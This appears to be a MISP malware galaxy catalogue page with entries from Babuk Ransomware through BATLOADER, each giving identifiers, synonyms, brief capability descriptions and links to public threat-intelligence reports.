Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were observed over time as well. It uses an Elliptic Curve algorithm (Montgomery Algorithm) to build the encryption keys.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Babuk (Windows).
Known Synonyms |
---|
Babyk |
Vasa Locker |
Internal MISP references
UUID 3e243686-a0a0-4aff-b149-786cc3f99a84
which can be used as unique global reference for Babuk (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html - webarchive
- https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html - webarchive
- https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/ - webarchive
- https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/ - webarchive
- https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/ - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf - webarchive
- https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/ - webarchive
- https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/ - webarchive
- https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/ - webarchive
- https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/ - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/ - webarchive
- https://securelist.com/ransomware-world-in-2021/102169/ - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
- https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62 - webarchive
- https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings - webarchive
- https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt - webarchive
- https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://blog.morphisec.com/babuk-ransomware-variant-major-attack - webarchive
- https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b - webarchive
- https://twitter.com/GossiTheDog/status/1409117153182224386 - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://twitter.com/Sebdraven/status/1346377590525845504 - webarchive
- https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/ - webarchive
- https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/ - webarchive
- https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/ - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://github.com/EmissarySpider/ransomware-descendants - webarchive
- https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ - webarchive
- https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1 - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
- https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/ - webarchive
- https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f - webarchive
- https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/ - webarchive
- https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/ - webarchive
- https://mssplab.github.io/threat-hunting/2023/06/15/malware-analysis-babuk.html - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BabyLon RAT
Internal MISP references
UUID 1a196c09-f7cd-4a6e-bc3c-2489121b5381
which can be used as unique global reference for BabyLon RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BABYMETAL
BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.
Internal MISP references
UUID 30c2e5c6-851d-4f3a-8b6e-2e7b69a26467
which can be used as unique global reference for BABYMETAL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000 - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BabyShark
BabyShark is a Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first-stage HTA from a remote location, so it can be delivered via different file types, including PE files as well as malicious documents. It exfiltrates system information to a C2 server, maintains persistence on the system, and waits for further instructions from the operator.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BabyShark.
Known Synonyms |
---|
LATEOP |
Internal MISP references
UUID 8abdd40c-d79a-4353-80e3-29f8a4229a37
which can be used as unique global reference for BabyShark
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
- https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf - webarchive
- https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite - webarchive
- https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - webarchive
- https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood - webarchive
- https://www.youtube.com/watch?v=Dv2_DK3tRgI - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html - webarchive
- https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
- https://twitter.com/i/web/status/1099147896950185985 - webarchive
- https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark - webarchive
- https://blog.alyac.co.kr/3352 - webarchive
- https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/ - webarchive
- https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bachosens
Internal MISP references
UUID c5b3d358-62f8-46fe-85dc-44b565052f94
which can be used as unique global reference for Bachosens
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BACKBEND
FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.
Internal MISP references
UUID 934da8b2-f66e-4056-911e-1da09216e8b8
which can be used as unique global reference for BACKBEND
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BackConfig
Internal MISP references
UUID b3c517cf-6704-43b0-a6da-fed94c9b537a
which can be used as unique global reference for BackConfig
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BackNet
Internal MISP references
UUID e2840cc1-c43d-4542-9818-a3c15a0f9f7a
which can be used as unique global reference for BackNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Backoff POS
Internal MISP references
UUID 70f68c8c-4dc5-4bb0-9f4d-a7484561574b
which can be used as unique global reference for Backoff POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
backspace
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular backspace.
Known Synonyms |
---|
Lecna |
ZRLnk |
Internal MISP references
UUID 23398248-a52a-4a7c-af10-262822d33a4e
which can be used as unique global reference for backspace
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-geneva - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BackSwap
Internal MISP references
UUID 4ec40af9-0295-4b9a-81ad-b7017a21609d
which can be used as unique global reference for BackSwap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap - webarchive
- https://www.cert.pl/en/news/single/backswap-malware-analysis/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/ - webarchive
- https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/ - webarchive
- https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/ - webarchive
- https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/ - webarchive
- https://research.checkpoint.com/the-evolution-of-backswap/ - webarchive
- https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf - webarchive
- https://explore.group-ib.com/htct/hi-tech_crime_2018 - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BADCALL (Windows)
Internal MISP references
UUID 9ddf546b-487f-44e4-b0dd-07e9997c86c6
which can be used as unique global reference for BADCALL (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar19-252a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BadEncript
Internal MISP references
UUID af1c99be-e55a-473e-abed-726191e1da05
which can be used as unique global reference for BadEncript
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
badflick
BADFLICK is a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.
Internal MISP references
UUID 1eceb5c0-3a01-43c2-b204-9957b15cf763
which can be used as unique global reference for badflick
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BADHATCH
Internal MISP references
UUID 8e8880bf-d016-4759-a138-2fdb4e54f9ab
which can be used as unique global reference for BADHATCH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch - webarchive
- https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BadNews
Internal MISP references
UUID f28fa5ca-9466-410c-aa32-4bd102f3f0e1
which can be used as unique global reference for BadNews
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews - webarchive
- http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1 - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf - webarchive
- https://lab52.io/blog/new-patchwork-campaign-against-pakistan/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait - webarchive
- https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign - webarchive
- https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/ - webarchive
- http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2 - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/ - webarchive
- https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bagle
Internal MISP references
UUID f09af1cc-cf9d-499a-9026-e783a3897508
which can be used as unique global reference for Bagle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bahamut (Windows)
Internal MISP references
UUID b420eb9f-d526-473c-95ab-5ab380bbec72
which can be used as unique global reference for Bahamut (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf - webarchive
- https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/ - webarchive
- https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Baldr
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Baldr.
Known Synonyms |
---|
Baldir |
Internal MISP references
UUID 7024893a-96fe-4de4-bb04-c1d4794a4c95
which can be used as unique global reference for Baldr
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr - webarchive
- https://www.youtube.com/watch?v=E2V4kB_gtcQ - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/ - webarchive
- https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BalkanDoor
According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.
Internal MISP references
UUID 22d61347-4d89-41e7-89dc-95b1f370522d
which can be used as unique global reference for BalkanDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BalkanRAT
The goal of BalkanRAT, which is the more complex part of the malicious Balkan toolset (cf. BalkanDoor), is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least since January 2016 and targeted accounting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (judging by the contents of the emails, the included links and the decoy PDFs, all of which involved taxes). It was legitimately signed and was installed via an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).
Internal MISP references
UUID d7b40333-a2ce-423d-9052-51b09bf18bb3
which can be used as unique global reference for BalkanRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bamital
Internal MISP references
UUID f355f41b-a6b2-48b7-9c5c-da99a41cb1ad
which can be used as unique global reference for Bamital
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital - webarchive
- https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf - webarchive
- https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Banatrix
Internal MISP references
UUID 721fe429-f240-4fd6-a5c9-187195624b51
which can be used as unique global reference for Banatrix
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
bancos
Internal MISP references
UUID a2ee2f24-ead8-4415-b777-7190478a620c
which can be used as unique global reference for bancos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bandit Stealer
Internal MISP references
UUID 53ef2273-0e62-4ad3-bcbc-d2cd72fc6108
which can be used as unique global reference for Bandit Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit - webarchive
- https://research.openanalysis.net/bandit/stealer/garble/go/obfuscation/2023/07/31/bandit-garble.html - webarchive
- https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html - webarchive
- https://www.trendmicro.com/en_in/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html - webarchive
- https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bandook
Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. Over the years, several variants of Bandook were leaked online, and the malware became available for public download.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bandook.
Known Synonyms |
---|
Bandok |
Internal MISP references
UUID 3144e23d-6e3e-47e6-8f0e-a47be25d1041
which can be used as unique global reference for Bandook
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook - webarchive
- https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/ - webarchive
- https://research.checkpoint.com/2020/bandook-signed-delivered - webarchive
- https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america - webarchive
- https://www.eff.org/files/2018/01/29/operation-manul.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook - webarchive
- https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot - webarchive
- https://research.checkpoint.com/2020/bandook-signed-delivered/ - webarchive
- https://twitter.com/malwrhunterteam/status/796425285197561856 - webarchive
- https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving - webarchive
- https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
bangat
Internal MISP references
UUID 5c3c53ff-c81f-4daa-9b60-672650046ed7
which can be used as unique global reference for bangat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Banjori
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Banjori.
Known Synonyms |
---|
BackPatcher |
BankPatch |
MultiBanker 2 |
Internal MISP references
UUID 137cde28-5c53-489b-ad0b-d0fa2e342324
which can be used as unique global reference for Banjori
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bankshot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bankshot.
Known Synonyms |
---|
COPPERHEDGE |
FoggyBrass |
Internal MISP references
UUID bc67677c-c0e7-4fb1-8619-7f43fa3ff886
which can be used as unique global reference for Bankshot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://malverse.it/analisi-bankshot-copperhedge - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-gladstone - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://blog.reversinglabs.com/blog/hidden-cobra - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa22-108a - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-133a - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-108a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BanPolMex RAT
BanPolMex is a remote access trojan that uses TCP for communication.
It uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.
It sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.
It supports almost 30 commands that include operations on the victim's filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker's C&C server. As in many RATs from the Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indices are convertible into a meaningful ASCII representation, which even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.
It has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).
BanPolMex RAT was delivered to victims of a watering hole campaign targeting employees of Polish and Mexican banks that was discovered in February 2017. It is usually loaded by HOTWAX.
Internal MISP references
UUID 95d699dc-d19e-47a7-9d38-fef5008ce891
which can be used as unique global reference for BanPolMex RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Barb(ie) Downloader
Internal MISP references
UUID dbf9d453-cf02-4861-ab90-f65bb77d5971
which can be used as unique global reference for Barb(ie) Downloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BarbWire
Internal MISP references
UUID 7e68e486-08a8-4d09-997f-2b844cf86fc2
which can be used as unique global reference for BarbWire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
barkiofork
Internal MISP references
UUID d2cdaceb-7810-4c80-9a69-0a6f27832725
which can be used as unique global reference for barkiofork
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bart
Internal MISP references
UUID 1dfd3ba6-7f82-407f-958d-c4a2ac055123
which can be used as unique global reference for Bart
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bart - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BatchWiper
Internal MISP references
UUID b74747e0-59ac-4adf-baac-78213a234ff5
which can be used as unique global reference for BatchWiper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Batel
Internal MISP references
UUID 3900aa45-a7ff-48cc-9ac0-58c7c372991e
which can be used as unique global reference for Batel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BATLOADER
According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer, Visual Studio) bundled with this malware. We have found those installers on compromised websites.
Internal MISP references
UUID ce6fe6c6-a74a-4cf7-adf8-41b5433bcbb6
which can be used as unique global reference for BATLOADER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader - webarchive
- https://www.seqrite.com/blog/decoding-batloader-2-x-unmasking-the-threat-of-stealthy-malware-tactics/ - webarchive
- https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - webarchive
- https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html - webarchive
